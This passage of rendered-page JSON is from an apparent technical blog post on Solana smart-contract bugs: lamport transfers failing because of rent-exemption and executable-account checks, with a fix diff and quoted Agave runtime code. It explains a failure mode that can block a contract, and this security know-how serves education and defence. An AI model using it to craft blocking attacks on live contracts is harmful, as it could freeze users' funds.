post_data_size",{"type":25,"tag":216,"props":76779,"children":76780},{"style":6953},[76781],{"type":31,"value":7232},{"type":25,"tag":216,"props":76783,"children":76784},{"style":6947},[76785],{"type":31,"value":76720},{"type":25,"tag":216,"props":76787,"children":76788},{"style":6953},[76789],{"type":31,"value":18142},{"type":25,"tag":216,"props":76791,"children":76792},{"style":6947},[76793],{"type":31,"value":76604},{"type":25,"tag":216,"props":76795,"children":76796},{"style":6953},[76797],{"type":31,"value":12149},{"type":25,"tag":216,"props":76799,"children":76800},{"style":6947},[76801],{"type":31,"value":76802}," pre_lamports\n",{"type":25,"tag":216,"props":76804,"children":76805},{"class":6922,"line":7613},[76806],{"type":25,"tag":216,"props":76807,"children":76808},{"style":6964},[76809],{"type":31,"value":75033},{"type":25,"tag":216,"props":76811,"children":76812},{"class":6922,"line":7636},[76813],{"type":25,"tag":216,"props":76814,"children":76815},{"style":6964},[76816],{"type":31,"value":75041},{"type":25,"tag":216,"props":76818,"children":76819},{"class":6922,"line":7645},[76820],{"type":25,"tag":216,"props":76821,"children":76822},{"style":6964},[76823],{"type":31,"value":62852},{"type":25,"tag":216,"props":76825,"children":76826},{"class":6922,"line":7654},[76827],{"type":25,"tag":216,"props":76828,"children":76829},{"style":6964},[76830],{"type":31,"value":7302},{"type":25,"tag":216,"props":76832,"children":76833},{"class":6922,"line":7722},[76834],{"type":25,"tag":216,"props":76835,"children":76836},{"style":6964},[76837],{"type":31,"value":7311},{"type":25,"tag":38,"props":76839,"children":76840},{},[76841],{"type":31,"value":76842},"You can check the rent-exemption threshold for a zero-data account with the CLI:",{"type":25,"tag":206,"props":76844,"children":76846},{"className":8191,"code":76845,"language":8190,"meta":7,"style":7},"solana rent 0\nRent-exempt minimum: 0.00089088 SOL\n",[76847],{"type":25,"tag":82,"props":76848,"children":76849},{"__ignoreMap":7},[76850,76866],{"type":25,"tag":216,"props":76851,"children":76852},{"class":6922,"line":6923},[76853,76857,76862],{"type":25,"tag":216,"props":76854,"children":76855},{"style":7047},[76856],{"type":31,"value":6815},{"type":25,"tag":216,"props":76858,"children":76859},{"style":8205},[76860],{"type":31,"value":76861}," rent",{"type":25,"tag":216,"props":76863,"children":76864},{"style":6989},[76865],{"type":31,"value":28236},{"type":25,"tag":216,"props":76867,"children":76868},{"class":6922,"line":6769},[76869,76874,76879,76884],{"type":25,"tag":216,"props":76870,"children":76871},{"style":7047},[76872],{"type":31,"value":76873},"Rent-exempt",{"type":25,"tag":216,"props":76875,"children":76876},{"style":8205},[76877],{"type":31,"value":76878}," minimum:",{"type":25,"tag":216,"props":76880,"children":76881},{"style":6989},[76882],{"type":31,"value":76883}," 0.00089088",{"type":25,"tag":216,"props":76885,"children":76886},{"style":8205},[76887],{"type":31,"value":76888}," SOL\n",{"type":25,"tag":630,"props":76890,"children":76892},{"id":76891},"fix-1-only-reimburse-if-rent-exempt",[76893],{"type":31,"value":76894},"Fix 1: Only Reimburse if Rent-Exempt",{"type":25,"tag":38,"props":76896,"children":76897},{},[76898],{"type":31,"value":76899},"We don't want to donate anything to an unfair king! So let's update our program to reimburse only if the old king will be rent-exempt after the transfer:",{"type":25,"tag":206,"props":76901,"children":76903},{"className":44324,"code":76902,"language":44326,"meta":7,"style":7},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n+let rent = Rent::get()?;\n+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n    transfer_from_pda(\n        &ctx.accounts.throne.to_account_info(),\n        &ctx.accounts.old_king,\n        to_reimburse,\n    )?;\n+}\n",[76904],{"type":25,"tag":82,"props":76905,"children":76906},{"__ignoreMap":7},[76907,76915,76923,76931,76939,76947,76955,76963,76971,76979],{"type":25,"tag":216,"props":76908,"children":76909},{"class":6922,"line":6923},[76910],{"type":25,"tag":216,"props":76911,"children":76912},{"style":6964},[76913],{"type":31,"value":76914},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n",{"type":25,"tag":216,"props":76916,"children":76917},{"class":6922,"line":6769},[76918],{"type":25,"tag":216,"props":76919,"children":76920},{"style":6989},[76921],{"type":31,"value":76922},"+let rent = Rent::get()?;\n",{"type":25,"tag":216,"props":76924,"children":76925},{"class":6922,"line":6778},[76926],{"type":25,"tag":216,"props":76927,"children":76928},{"style":6989},[76929],{"type":31,"value":76930},"+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n",{"type":25,"tag":216,"props":76932,"children":76933},{"class":6922,"line":7005},[76934],{"type":25,"tag":216,"props":76935,"children":76936},{"style":6989},[76937],{"type":31,"value":76938},"+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n",{"type":25,"tag":216,"props":76940,"children":76941},{"class":6922,"line":7110},[76942],{"type":25,"tag":216,"props":76943,"children":76944},{"style":6964},[76945],{"type":31,"value":76946},"    transfer_from_pda(\n",{"type":25,"tag":216,"props":76948,"children":76949},{"class":6922,"line":7216},[76950],{"type":25,"tag":216,"props":76951,"children":76952},{"style":6964},[76953],{"type":31,"value":76954},"        &ctx.accounts.throne.to_account_info(),\n",{"type":25,"tag":216,"props":76956,"children":76957},{"class":6922,"line":7244},[76958],{"type":25,"tag":216,"props":76959,"children":76960},{"style":6964},[76961],{"type":31,"value":76962},"        &ctx.accounts.old_king,\n",{"type":25,"tag":216,"props":76964,"children":76965},{"class":6922,"line":7257},[76966],{"type":25,"tag":216,"props":76967,"children":76968},{"style":6964},[76969],{"type":31,"value":76970},"        to_reimburse,\n",{"type":25,"tag":216,"props":76972,"children":76973},{"class":6922,"line":7275},[76974],{"type":25,"tag":216,"props":76975,"children":76976},{"style":6964},[76977],{"type":31,"value":76978},"    )?;\n",{"type":25,"tag":216,"props":76980,"children":76981},{"class":6922,"line":7296},[76982],{"type":25,"tag":216,"props":76983,"children":76984},{"style":6989},[76985],{"type":31,"value":76986},"+}\n",{"type":25,"tag":38,"props":76988,"children":76989},{},[76990],{"type":31,"value":76991},"But is rent-exemption the only thing that can cause a lamport transfer to fail? Not quite.",{"type":25,"tag":606,"props":76993,"children":76995},{"id":76994},"bug-2-writable-but-untouchable-set_lamports-fails",[76996,76998,77004],{"type":31,"value":76997},"Bug 2: Writable but Untouchable — ",{"type":25,"tag":82,"props":76999,"children":77001},{"className":77000},[],[77002],{"type":31,"value":77003},"set_lamports",{"type":31,"value":77005}," Fails",{"type":25,"tag":38,"props":77007,"children":77008},{},[77009,77011,77018],{"type":31,"value":77010},"Let's look at ",{"type":25,"tag":162,"props":77012,"children":77015},{"href":77013,"rel":77014},"https://github.com/anza-xyz/agave/blob/f389dd23067e37d756c3f9d2f3d50e339dad7053/transaction-context/src/lib.rs#L863-L885",[166],[77016],{"type":31,"value":77017},"BorrowedAccount::set_lamports",{"type":31,"value":179},{"type":25,"tag":206,"props":77020,"children":77022},{"className":6915,"code":77021,"language":6914,"meta":7,"style":7},"/// Overwrites the number of lamports of this account (transaction wide)\n#[cfg(not(target_os = \"solana\"))]\npub fn set_lamports(&mut self, lamports: u64) -> Result\u003C(), InstructionError> {\n    // An account not owned by the program cannot have its balance decrease\n    if !self.is_owned_by_current_program() && lamports \u003C self.get_lamports() {\n        return Err(InstructionError::ExternalAccountLamportSpend);\n    }\n    // The balance of read-only may not change\n    if !self.is_writable() {\n        return Err(InstructionError::ReadonlyLamportChange);\n    }\n    // The balance of executable accounts may not change\n    if self.is_executable_internal() {\n        return Err(InstructionError::ExecutableLamportChange);\n    }\n    // don't touch the account if the lamports do not change\n    if self.get_lamports() == lamports {\n        return Ok(());\n    }\n    self.touch()?;\n    self.account.set_lamports(lamports);\n    Ok(())\n}\n\n/// Feature gating to remove `is_executable` flag related checks\n#[cfg(not(target_os = \"solana\"))]\n#[inline]\nfn is_executable_internal(&self) -> bool {\n    !self\n        .transaction_context\n        .remove_accounts_executable_flag_checks\n        && self.account.executable()\n}\n\n",[77023],{"type":25,"tag":82,"props":77024,"children":77025},{"__ignoreMap":7},[77026,77034,77055,77127,77135,77194,77226,77233,77241,77269,77301,77308,77316,77340,77372,77379,77387,77422,77438,77445,77473,77508,77519,77526,77533,77541,77560,77568,77608,77620,77632,77644,77675],{"type":25,"tag":216,"props":77027,"children":77028},{"class":6922,"line":6923},[77029],{"type":25,"tag":216,"props":77030,"children":77031},{"style":6927},[77032],{"type":31,"value":77033},"/// Overwrites the number of lamports of this account (transaction wide)\n",{"type":25,"tag":216,"props":77035,"children":77036},{"class":6922,"line":6769},[77037,77042,77046,77051],{"type":25,"tag":216,"props":77038,"children":77039},{"style":6964},[77040],{"type":31,"value":77041},"#[cfg(not(target_os ",{"type":25,"tag":216,"props":77043,"children":77044},{"style":6953},[77045],{"type":31,"value":266},{"type":25,"tag":216,"props":77047,"children":77048},{"style":8205},[77049],{"type":31,"value":77050}," \"solana\"",{"type":25,"tag":216,"props":77052,"children":77053},{"style":6964},[77054],{"type":31,"value":24568},{"type":25,"tag":216,"props":77056,"children":77057},{"class":6922,"line":6778},[77058,77062,77066,77071,77075,77079,77083,77087,77091,77095,77099,77103,77107,77111,77115,77119,77123],{"type":25,"tag":216,"props":77059,"children":77060},{"style":6936},[77061],{"type":31,"value":17647},{"type":25,"tag":216,"props":77063,"children":77064},{"style":6936},[77065],{"type":31,"value":17652},{"type":25,"tag":216,"props":77067,"children":77068},{"style":7047},[77069],{"type":31,"value":77070}," set_lamports",{"type":25,"tag":216,"props":77072,"children":77073},{"style":6964},[77074],{"type":31,"value":1850},{"type":25,"tag":216,"props":77076,"children":77077},{"style":6953},[77078],{"type":31,"value":7059},{"type":25,"tag":216,"props":77080,"children":77081},{"style":6936},[77082],{"type":31,"value":7691},{"type":25,"tag":216,"props":77084,"children":77085},{"style":6936},[77086],{"type":31,"value":17754},{"type":25,"tag":216,"props":77088,"children":77089},{"style":6964},[77090],{"type":31,"value":7026},{"type":25,"tag":216,"props":77092,"children":77093},{"style":6947},[77094],{"type":31,"value":19469},{"type":25,"tag":216,"props":77096,"children":77097},{"style":6953},[77098],{"type":31,"value":1472},{"type":25,"tag":216,"props":77100,"children":77101},{"style":7375},[77102],{"type":31,"value":9811},{"type":25,"tag":216,"props":77104,"children":77105},{"style":6964},[77106],{"type":31,"value":7036},{"type":25,"tag":216,"props":77108,"children":77109},{"style":6953},[77110],{"type":31,"value":17714},{"type":25,"tag":216,"props":77112,"children":77113},{"style":7375},[77114],{"type":31,"value":17719},{"type":25,"tag":216,"props":77116,"children":77117},{"style":6964},[77118],{"type":31,"value":17724},{"type":25,"tag":216,"props":77120,"children":77121},{"style":7375},[77122],{"type":31,"value":19716},{"type":25,"tag":216,"props":77124,"children":77125},{"style":6964},[77126],{"type":31,"value":11233},{"type":25,"tag":216,"props":77128,"children":77129},{"class":6922,"line":7005},[77130],{"type":25,"tag":216,"props":77131,"children":77132},{"style":6927},[77133],{"type":31,"value":77134},"    // An account not owned by the program cannot have its balance decrease\n",{"type":25,"tag":216,"props":77136,"children":77137},{"class":6922,"line":7110},[77138,77142,77146,77150,77154,77159,77163,77168,77173,77177,77181,77185,77190],{"type":25,"tag":216,"props":77139,"children":77140},{"style":6973},[77141],{"type":31,"value":16235},{"type":25,"tag":216,"props":77143,"children":77144},{"style":6953},[77145],{"type":31,"value":16820},{"type":25,"tag":216,"props":77147,"children":77148},{"style":6936},[77149],{"type":31,"value":17670},{"type":25,"tag":216,"props":77151,"children":77152},{"style":6953},[77153],{"type":31,"value":179},{"type":25,"tag":216,"props":77155,"children":77156},{"style":7047},[77157],{"type":31,"value":77158},"is_owned_by_current_program",{"type":25,"tag":216,"props":77160,"children":77161},{"style":6964},[77162],{"type":31,"value":18000},{"type":25,"tag":216,"props":77164,"children":77165},{"style":6953},[77166],{"type":31,"value":77167},"&&",{"type":25,"tag":216,"props":77169,"children":77170},{"style":6947},[77171],{"type":31,"value":77172}," lamports",{"type":25,"tag":216,"props":77174,"children":77175},{"style":6953},[77176],{"type":31,"value":12672},{"type":25,"tag":216,"props":77178,"children":77179},{"style":6936},[77180],{"type":31,"value":17754},{"type":25,"tag":216,"props":77182,"children":77183},{"style":6953},[77184],{"type":31,"value":179},{"type":25,"tag":216,"props":77186,"children":77187},{"style":7047},[77188],{"type":31,"value":77189},"get_lamports",{"type":25,"tag":216,"props":77191,"children":77192},{"style":6964},[77193],{"type":31,"value":19694},{"type":25,"tag":216,"props":77195,"children":77196},{"class":6922,"line":7216},[77197,77201,77205,77209,77213,77217,77222],{"type":25,"tag":216,"props":77198,"children":77199},{"style":6973},[77200],{"type":31,"value":19702},{"type":25,"tag":216,"props":77202,"children":77203},{"style":7375},[77204],{"type":31,"value":19707},{"type":25,"tag":216,"props":77206,"children":77207},{"style":6964},[77208],{"type":31,"value":1850},{"type":25,"tag":216,"props":77210,"children":77211},{"style":7375},[77212],{"type":31,"value":19716},{"type":25,"tag":216,"props":77214,"children":77215},{"style":6953},[77216],{"type":31,"value":7438},{"type":25,"tag":216,"props":77218,"children":77219},{"style":7375},[77220],{"type":31,"value":77221},"ExternalAccountLamportSpend",{"type":25,"tag":216,"props":77223,"children":77224},{"style":6964},[77225],{"type":31,"value":7797},{"type":25,"tag":216,"props":77227,"children":77228},{"class":6922,"line":7244},[77229],{"type":25,"tag":216,"props":77230,"children":77231},{"style":6964},[77232],{"type":31,"value":7311},{"type":25,"tag":216,"props":77234,"children":77235},{"class":6922,"line":7257},[77236],{"type":25,"tag":216,"props":77237,"children":77238},{"style":6927},[77239],{"type":31,"value":77240},"    // The balance of read-only may not change\n",{"type":25,"tag":216,"props":77242,"children":77243},{"class":6922,"line":7275},[77244,77248,77252,77256,77260,77265],{"type":25,"tag":216,"props":77245,"children":77246},{"style":6973},[77247],{"type":31,"value":16235},{"type":25,"tag":216,"props":77249,"children":77250},{"style":6953},[77251],{"type":31,"value":16820},{"type":25,"tag":216,"props":77253,"children":77254},{"style":6936},[77255],{"type":31,"value":17670},{"type":25,"tag":216,"props":77257,"children":77258},{"style":6953},[77259],{"type":31,"value":179},{"type":25,"tag":216,"props":77261,"children":77262},{"style":7047},[77263],{"type":31,"value":77264},"is_writable",{"type":25,"tag":216,"props":77266,"children":77267},{"style":6964},[77268],{"type":31,"value":19694},{"type":25,"tag":216,"props":77270,"children":77271},{"class":6922,"line":7296},[77272,77276,77280,77284,77288,77292,77297],{"type":25,"tag":216,"props":77273,"children":77274},{"style":6973},[77275],{"type":31,"value":19702},{"type":25,"tag":216,"props":77277,"children":77278},{"style":7375},[77279],{"type":31,"value":19707},{"type":25,"tag":216,"props":77281,"children":77282},{"style":6964},[77283],{"type":31,"value":1850},{"type":25,"tag":216,"props":77285,"children":77286},{"style":7375},[77287],{"type":31,"value":19716},{"type":25,"tag":216,"props":77289,"children":77290},{"style":6953},[77291],{"type":31,"value":7438},{"type":25,"tag":216,"props":77293,"children":77294},{"style":7375},[77295],{"type":31,"value":77296},"ReadonlyLamportChange",{"type":25,"tag":216,"props":77298,"children":77299},{"style":6964},[77300],{"type":31,"value":7797},{"type":25,"tag":216,"props":77302,"children":77303},{"class":6922,"line":7305},[77304],{"type":25,"tag":216,"props":77305,"children":77306},{"style":6964},[77307],{"type":31,"value":7311},{"type":25,"tag":216,"props":77309,"children":77310},{"class":6922,"line":7557},[77311],{"type":25,"tag":216,"props":77312,"children":77313},{"style":6927},[77314],{"type":31,"value":77315},"    // The balance of executable accounts may not change\n",{"type":25,"tag":216,"props":77317,"children":77318},{"class":6922,"line":7574},[77319,77323,77327,77331,77336],{"type":25,"tag":216,"props":77320,"children":77321},{"style":6973},[77322],{"type":31,"value":16235},{"type":25,"tag":216,"props":77324,"children":77325},{"style":6936},[77326],{"type":31,"value":17754},{"type":25,"tag":216,"props":77328,"children":77329},{"style":6953},[77330],{"type":31,"value":179},{"type":25,"tag":216,"props":77332,"children":77333},{"style":7047},[77334],{"type":31,"value":77335},"is_executable_internal",{"type":25,"tag":216,"props":77337,"children":77338},{"style":6964},[77339],{"type":31,"value":19694},{"type":25,"tag":216,"props":77341,"children":77342},{"class":6922,"line":7591},[77343,77347,77351,77355,77359,77363,77368],{"type":25,"tag":216,"props":77344,"children":77345},{"style":6973},[77346],{"type":31,"value":19702},{"type":25,"tag":216,"props":77348,"children":77349},{"style":7375},[77350],{"type":31,"value":19707},{"type":25,"tag":216,"props":77352,"children":77353},{"style":6964},[77354],{"type":31,"value":1850},{"type":25,"tag":216,"props":77356,"children":77357},{"style":7375},[77358],{"type":31,"value":19716},{"type":25,"tag":216,"props":77360,"children":77361},{"style":6953},[77362],{"type":31,"value":7438},{"type":25,"tag":216,"props":77364,"children":77365},{"style":7375},[77366],{"type":31,"value":77367},"ExecutableLamportChange",{"type":25,"tag":216,"props":77369,"children":77370},{"style":6964},[77371],{"type":31,"value":7797},{"type":25,"tag":216,"props":77373,"children":77374},{"class":6922,"line":7604},[77375],{"type":25,"tag":216,"props":77376,"children":77377},{"style":6964},[77378],{"type":31,"value":7311},{"type":25,"tag":216,"props":77380,"children":77381},{"class":6922,"line":7613},[77382],{"type":25,"tag":216,"props":77383,"children":77384},{"style":6927},[77385],{"type":31,"value":77386},"    // don't touch the account if the lamports do not change\n",{"type":25,"tag":216,"props":77388,"children":77389},{"class":6922,"line":7636},[77390,77394,77398,77402,77406,77410,77414,77418],{"type":25,"tag":216,"props":77391,"children":77392},{"style":6973},[77393],{"type":31,"value":16235},{"type":25,"tag":216,"props":77395,"children":77396},{"style":6936},[77397],{"type":31,"value":17754},{"type":25,"tag":216,"props":77399,"children":77400},{"style":6953},[77401],{"type":31,"value":179},{"type":25,"tag":216,"props":77403,"children":77404},{"style":7047},[77405],{"type":31,"value":77189},{"type":25,"tag":216,"props":77407,"children":77408},{"style":6964},[77409],{"type":31,"value":18000},{"type":25,"tag":216,"props":77411,"children":77412},{"style":6953},[77413],{"type":31,"value":12528},{"type":25,"tag":216,"props":77415,"children":77416},{"style":6947},[77417],{"type":31,"value":77172},{"type":25,"tag":216,"props":77419,"children":77420},{"style":6964},[77421],{"type":31,"value":7241},{"type":25,"tag":216,"props":77423,"children":77424},{"class":6922,"line":7645},[77425,77429,77433],{"type":25,"tag":216,"props":77426,"children":77427},{"style":6973},[77428],{"type":31,"value":19702},{"type":25,"tag":216,"props":77430,"children":77431},{"style":7375},[77432],{"type":31,"value":46902},{"type":25,"tag":216,"props":77434,"children":77435},{"style":6964},[77436],{"type":31,"value":77437},"(());\n",{"type":25,"tag":216,"props":77439,"children":77440},{"class":6922,"line":7654},[77441],{"type":25,"tag":216,"props":77442,"children":77443},{"style":6964},[77444],{"type":31,"value":7311},{"type":25,"tag":216,"props":77446,"children":77447},{"class":6922,"line":7722},[77448,77452,77456,77461,77465,77469],{"type":25,"tag":216,"props":77449,"children":77450},{"style":6936},[77451],{"type":31,"value":24746},{"type":25,"tag":216,"props":77453,"children":77454},{"style":6953},[77455],{"type":31,"value":179},{"type":25,"tag":216,"props":77457,"children":77458},{"style":7047},[77459],{"type":31,"value":77460},"touch",{"type":25,"tag":216,"props":77462,"children":77463},{"style":6964},[77464],{"type":31,"value":17836},{"type":25,"tag":216,"props":77466,"children":77467},{"style":6953},[77468],{"type":31,"value":604},{"type":25,"tag":216,"props":77470,"children":77471},{"style":6964},[77472],{"type":31,"value":6967},{"type":25,"tag":216,"props":77474,"children":77475},{"class":6922,"line":7730},[77476,77480,77484,77488,77492,77496,77500,77504],{"type":25,"tag":216,"props":77477,"children":77478},{"style":6936},[77479],{"type":31,"value":24746},{"type":25,"tag":216,"props":77481,"children":77482},{"style":6953},[77483],{"type":31,"value":179},{"type":25,"tag":216,"props":77485,"children":77486},{"style":6964},[77487],{"type":31,"value":16909},{"type":25,"tag":216,"props":77489,"children":77490},{"style":6953},[77491],{"type":31,"value":179},{"type":25,"tag":216,"props":77493,"children":77494},{"style":7047},[77495],{"type":31,"value":77003},{"type":25,"tag":216,"props":77497,"children":77498},{"style":6964},[77499],{"type":31,"value":1850},{"type":25,"tag":216,"props":77501,"children":77502},{"style":6947},[77503],{"type":31,"value":19469},{"type":25,"tag":216,"props":77505,"children":77506},{"style":6964},[77507],{"type":31,"value":7797},{"type":25,"tag":216,"props":77509,"children":77510},{"class":6922,"line":7760},[77511,77515],{"type":25,"tag":216,"props":77512,"children":77513},{"style":7375},[77514],{"type":31,"value":18290},{"type":25,"tag":216,"props":77516,"children":77517},{"style":6964},[77518],{"type":31,"value":18295},{"type":25,"tag":216,"props":77520,"children":77521},{"class":6922,"line":7768},[77522],{"type":25,"tag":216,"props":77523,"children":77524},{"style":6964},[77525],{"type":31,"value":7874},{"type":25,"tag":216,"props":77527,"children":77528},{"class":6922,"line":7800},[77529],{"type":25,"tag":216,"props":77530,"children":77531},{"emptyLinePlaceholder":16},[77532],{"type":31,"value":7642},{"type":25,"tag":216,"props":77534,"children":77535},{"class":6922,"line":7808},[77536],{"type":25,"tag":216,"props":77537,"children":77538},{"style":6927},[77539],{"type":31,"value":77540},"/// Feature gating to remove `is_executable` flag related checks\n",{"type":25,"tag":216,"props":77542,"children":77543},{"class":6922,"line":7868},[77544,77548,77552,77556],{"type":25,"tag":216,"props":77545,"children":77546},{"style":6964},[77547],{"type":31,"value":77041},{"type":25,"tag":216,"props":77549,"children":77550},{"style":6953},[77551],{"type":31,"value":266},{"type":25,"tag":216,"props":77553,"children":77554},{"style":8205},[77555],{"type":31,"value":77050},{"type":25,"tag":216,"props":77557,"children":77558},{"style":6964},[77559],{"type":31,"value":24568},{"type":25,"tag":216,"props":77561,"children":77562},{"class":6922,"line":13001},[77563],{"type":25,"tag":216,"props":77564,"children":77565},{"style":6964},[77566],{"type":31,"value":77567},"#[inline]\n",{"type":25,"tag":216,"props":77569,"children":77570},{"class":6922,"line":13019},[77571,77575,77580,77584,77588,77592,77596,77600,77604],{"type":25,"tag":216,"props":77572,"children":77573},{"style":6936},[77574],{"type":31,"value":24226},{"type":25,"tag":216,"props":77576,"children":77577},{"style":7047},[77578],{"type":31,"value":77579}," is_executable_internal",{"type":25,"tag":216,"props":77581,"children":77582},{"style":6964},[77583],{"type":31,"value":1850},{"type":25,"tag":216,"props":77585,"children":77586},{"style":6953},[77587],{"type":31,"value":7059},{"type":25,"tag":216,"props":77589,"children":77590},{"style":6936},[77591],{"type":31,"value":17670},{"type":25,"tag":216,"props":77593,"children":77594},{"style":6964},[77595],{"type":31,"value":7036},{"type":25,"tag":216,"props":77597,"children":77598},{"style":6953},[77599],{"type":31,"value":17714},{"type":25,"tag":216,"props":77601,"children":77602},{"style":7375},[77603],{"type":31,"value":16006},{"type":25,"tag":216,"props":77605,"children":77606},{"style":6964},[77607],{"type":31,"value":7241},{"type":25,"tag":216,"props":77609,"children":77610},{"class":6922,"line":13064},[77611,77615],{"type":25,"tag":216,"props":77612,"children":77613},{"style":6953},[77614],{"type":31,"value":24930},{"type":25,"tag":216,"props":77616,"children":77617},{"style":6936},[77618],{"type":31,"value":77619},"self\n",{"type":25,"tag":216,"props":77621,"children":77622},{"class":6922,"line":13170},[77623,77627],{"type":25,"tag":216,"props":77624,"children":77625},{"style":6953},[77626],{"type":31,"value":72229},{"type":25,"tag":216,"props":77628,"children":77629},{"style":6964},[77630],{"type":31,"value":77631},"transaction_context\n",{"type":25,"tag":216,"props":77633,"children":77634},{"class":6922,"line":27455},[77635,77639],{"type":25,"tag":216,"props":77636,"children":77637},{"style":6953},[77638],{"type":31,"value":72229},{"type":25,"tag":216,"props":77640,"children":77641},{"style":6964},[77642],{"type":31,"value":77643},"remove_accounts_executable_flag_checks\n",{"type":25,"tag":216,"props":77645,"children":77646},{"class":6922,"line":27490},[77647,77651,77655,77659,77663,77667,77671],{"type":25,"tag":216,"props":77648,"children":77649},{"style":6953},[77650],{"type":31,"value":46766},{"type":25,"tag":216,"props":77652,"children":77653},{"style":6936},[77654],{"type":31,"value":17754},{"type":25,"tag":216,"props":77656,"children":77657},{"style":6953},[77658],{"type":31,"value":179},{"type":25,"tag":216,"props":77660,"children":77661},{"style":6964},[77662],{"type":31,"value":16909},{"type":25,"tag":216,"props":77664,"children":77665},{"style":6953},[77666],{"type":31,"value":179},{"type":25,"tag":216,"props":77668,"children":77669},{"style":7047},[77670],{"type":31,"value":19613},{"type":25,"tag":216,"props":77672,"children":77673},{"style":6964},[77674],{"type":31,"value":11687},{"type":25,"tag":216,"props":77676,"children":77677},{"class":6922,"line":27498},[77678],{"type":25,"tag":216,"props":77679,"children":77680},{"style":6964},[77681],{"type":31,"value":7874},{"type":25,"tag":38,"props":77683,"children":77684},{},[77685],{"type":31,"value":77686},"Turns out: even writable, rent-exempt accounts can still reject lamport transfers.",{"type":25,"tag":38,"props":77688,"children":77689},{},[77690,77692,77697],{"type":31,"value":77691},"Specifically, ",{"type":25,"tag":9273,"props":77693,"children":77694},{},[77695],{"type":31,"value":77696},"executable accounts",{"type":31,"value":77698}," cannot receive or send lamports — the runtime treats them as immutable.",{"type":25,"tag":630,"props":77700,"children":77702},{"id":77701},"sidebar-whats-the-executable-flag-anyway",[77703],{"type":31,"value":77704},"Sidebar: What's the executable Flag Anyway?",{"type":25,"tag":38,"props":77706,"children":77707},{},[77708,77709,77714],{"type":31,"value":474},{"type":25,"tag":82,"props":77710,"children":77712},{"className":77711},[],[77713],{"type":31,"value":19613},{"type":31,"value":77715}," flag is a legacy mechanism marking accounts that hold program code. Historically, an account with this flag was assumed to either contain immutable BPF bytecode or was a proxy to a built-in program, and therefore it made sense to consider it read-only for performance reasons.",{"type":25,"tag":38,"props":77717,"children":77718},{},[77719,77721,77726],{"type":31,"value":77720},"This behavior became problematic with the introduction of the ",{"type":25,"tag":9273,"props":77722,"children":77723},{},[77724],{"type":31,"value":77725},"Upgradeable BPF Loader",{"type":31,"value":77727},". A workaround was used to maintain compatibility with the existing runtime logic. The program data containing bpf bytecode was split into a separate account, ProgramData, with the program account now only containing an address pointing to the ProgramData account:",{"type":25,"tag":206,"props":77729,"children":77731},{"className":6915,"code":77730,"language":6914,"meta":7,"style":7},"Program {\n    /// Address of the ProgramData account.\n    programdata_address: Pubkey,\n},\nProgramData {\n    /// Slot that the program was last modified.\n    slot: u64,\n    /// Address of the Program's upgrade authority.\n    upgrade_authority_address: Option\u003CPubkey>,\n    // The raw program data follows this serialized structure in the\n    // account's data.\n},\n",[77732],{"type":25,"tag":82,"props":77733,"children":77734},{"__ignoreMap":7},[77735,77747,77755,77775,77783,77795,77803,77823,77831,77859,77867,77875],{"type":25,"tag":216,"props":77736,"children":77737},{"class":6922,"line":6923},[77738,77743],{"type":25,"tag":216,"props":77739,"children":77740},{"style":7375},[77741],{"type":31,"value":77742},"Program",{"type":25,"tag":216,"props":77744,"children":77745},{"style":6964},[77746],{"type":31,"value":7241},{"type":25,"tag":216,"props":77748,"children":77749},{"class":6922,"line":6769},[77750],{"type":25,"tag":216,"props":77751,"children":77752},{"style":6927},[77753],{"type":31,"value":77754},"    /// Address of the ProgramData account.\n",{"type":25,"tag":216,"props":77756,"children":77757},{"class":6922,"line":6778},[77758,77763,77767,77771],{"type":25,"tag":216,"props":77759,"children":77760},{"style":6947},[77761],{"type":31,"value":77762},"    programdata_address",{"type":25,"tag":216,"props":77764,"children":77765},{"style":6953},[77766],{"type":31,"value":1472},{"type":25,"tag":216,"props":77768,"children":77769},{"style":7375},[77770],{"type":31,"value":24817},{"type":25,"tag":216,"props":77772,"children":77773},{"style":6964},[77774],{"type":31,"value":7465},{"type":25,"tag":216,"props":77776,"children":77777},{"class":6922,"line":7005},[77778],{"type":25,"tag":216,"props":77779,"children":77780},{"style":6964},[77781],{"type":31,"value":77782},"},\n",{"type":25,"tag":216,"props":77784,"children":77785},{"class":6922,"line":7110},[77786,77791],{"type":25,"tag":216,"props":77787,"children":77788},{"style":7375},[77789],{"type":31,"value":77790},"ProgramData",{"type":25,"tag":216,"props":77792,"children":77793},{"style":6964},[77794],{"type":31,"value":7241},{"type":25,"tag":216,"props":77796,"children":77797},{"class":6922,"line":7216},[77798],{"type":25,"tag":216,"props":77799,"children":77800},{"style":6927},[77801],{"type":31,"value":77802},"    /// Slot that the program was last modified.\n",{"type":25,"tag":216,"props":77804,"children":77805},{"class":6922,"line":7244},[77806,77811,77815,77819],{"type":25,"tag":216,"props":77807,"children":77808},{"style":6947},[77809],{"type":31,"value":77810},"    slot",{"type":25,"tag":216,"props":77812,"children":77813},{"style":6953},[77814],{"type":31,"value":1472},{"type":25,"tag":216,"props":77816,"children":77817},{"style":7375},[77818],{"type":31,"value":9811},{"type":25,"tag":216,"props":77820,"children":77821},{"style":6964},[77822],{"type":31,"value":7465},{"type":25,"tag":216,"props":77824,"children":77825},{"class":6922,"line":7257},[77826],{"type":25,"tag":216,"props":77827,"children":77828},{"style":6927},[77829],{"type":31,"value":77830},"    /// Address of the Program's upgrade authority.\n",{"type":25,"tag":216,"props":77832,"children":77833},{"class":6922,"line":7275},[77834,77839,77843,77847,77851,77855],{"type":25,"tag":216,"props":77835,"children":77836},{"style":6947},[77837],{"type":31,"value":77838},"    upgrade_authority_address",{"type":25,"tag":216,"props":77840,"children":77841},{"style":6953},[77842],{"type":31,"value":1472},{"type":25,"tag":216,"props":77844,"children":77845},{"style":7375},[77846],{"type":31,"value":31604},{"type":25,"tag":216,"props":77848,"children":77849},{"style":6964},[77850],{"type":31,"value":9757},{"type":25,"tag":216,"props":77852,"children":77853},{"style":7375},[77854],{"type":31,"value":25358},{"type":25,"tag":216,"props":77856,"children":77857},{"style":6964},[77858],{"type":31,"value":10089},{"type":25,"tag":216,"props":77860,"children":77861},{"class":6922,"line":7296},[77862],{"type":25,"tag":216,"props":77863,"children":77864},{"style":6927},[77865],{"type":31,"value":77866},"    // The raw program data follows this serialized structure in 